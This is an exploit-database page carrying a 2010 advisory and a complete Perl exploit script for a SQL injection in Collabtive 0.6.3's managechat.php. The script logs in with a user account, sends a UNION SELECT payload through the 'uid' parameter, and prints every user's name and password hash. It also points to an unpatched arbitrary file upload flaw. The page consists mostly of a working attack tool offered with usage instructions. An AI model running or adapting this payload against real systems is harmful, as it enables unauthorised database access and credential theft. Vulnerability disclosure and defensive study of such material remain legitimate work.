Collabtive 0.6.3 remote SQL injection

2010.06.15
Credit: DNX
Risk: Medium
Local: No
Remote: Yes
CVE: N/A
CWE: CWE-89

#!/usr/bin/perl use LWP::UserAgent; use HTTP::Request::Common qw(POST); use HTTP::Cookies; use Getopt::Long; # #'#/ # (-.-) # ------------------oOO---(_)---OOo----------------- # | __ __ | # | _____/ /_____ ______/ /_ __ ______ ______ | # | / ___/ __/ __ `/ ___/ __ / / / / __ `/ ___/ | # | (__ ) /_/ /_/ / / / /_/ / /_/ / /_/ (__ ) | # | /____/__/__,_/_/ /_.___/__,_/__, /____/ | # | Security Research Division /____/ 2o1o | # -------------------------------------------------- # | Collabtive v0.6.3 Multiple Vulnerabilities | # -------------------------------------------------- # [!] Discovered by.: DNX # [!] Homepage......: http://starbugs.host.sk # [!] Vendor........: http://collabtive.o-dyn.de # [!] Detected......: 04.06.2010 # [!] Reported......: 05.06.2010 # [!] Response......: xx.xx.2010 # # [!] Background....: Collabtive ist eine web-basierte Projektmanagementsoftware. # Das Projekt startete im November 2007. Es ist eine # Open-Source-Software und stellt eine Alternative zu proprietren # Werkzeugen wie Basecamp dar. Collabtive ist in PHP geschrieben. # # Collabtive wird von einem professionellen Team entwickelt. # # [!] Requirements..: Account needed # # [!] Bug...........: $_GET['uid'] in managechat.php near line 64 # # 12: $userto_id = getArrayVal($_GET, "uid"); # # 64: $sel = mysql_query("SELECT * FROM chat WHERE ufrom_id IN($userid,$userto_id) AND userto_id IN($userid,$userto_id) AND time > $start ORDER by time ASC"); # # The password is encoded with sha1. # # [!] Bug...........: The arbitrary file upload discovered by USH is still present. # See http://www.milw0rm.com/exploits/7076 more details. # if(!$ARGV[5]) { print "n \#'#/ "; print "n (-.-) "; print "n ---------------oOO---(_)---OOo---------------"; print "n | Collabtive v0.6.3 SQL Injection Exploit |"; print "n | coded by DNX |"; print "n ---------------------------------------------"; print "n[!] Usage: perl collabtive.pl [Host] [Path] <Options>"; print "n[!] Example: perl collabtive.pl 127.0.0.1 /collabtive/ -user test -pass 12345"; print "n[!] Options:"; print "n -user [text] Username"; print "n -pass [text] Password"; print "n -p [ip:port] Proxy support"; print "n"; exit; } my %options = (); GetOptions(%options, "user=s", "pass=s", "p=s"); my $ua = LWP::UserAgent->new(); my $cookie = HTTP::Cookies->new(); my $host = $ARGV[0]; my $path = $ARGV[1]; my $target = "http://".$host.$path; my $user = ""; my $pass = ""; if($options{"p"}) { $ua->proxy('http', "http://".$options{"p"}); } if($options{"user"}) { $user = $options{"user"}; } if($options{"pass"}) { $pass = $options{"pass"}; } print "[!] Exploiting...nn"; exploit(); print "n[!] Donen"; sub exploit { ############## # make login # ############## my $url = $target."manageuser.php?action=login"; my $res = $ua->post($url, [username => $user, pass => $pass]); $cookie->extract_cookies($res); $ua->cookie_jar($cookie); ############################ # get users with passwords # ############################ $url = $target."managechat.php?action=pull&uid=0) union select 1,2,name,4,5,6,pass from user/*"; $res = $ua->get($url); my $content = $res->content; my @c = split(/<br />/, $content); foreach (@c) { if($_ =~ /<b>(.*?):</b> (.*)/) { print $1.":".$2."n"; } } }


See this note in RAW Version
Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}
Copyright 2024, cxsecurity.com

 

Back to Top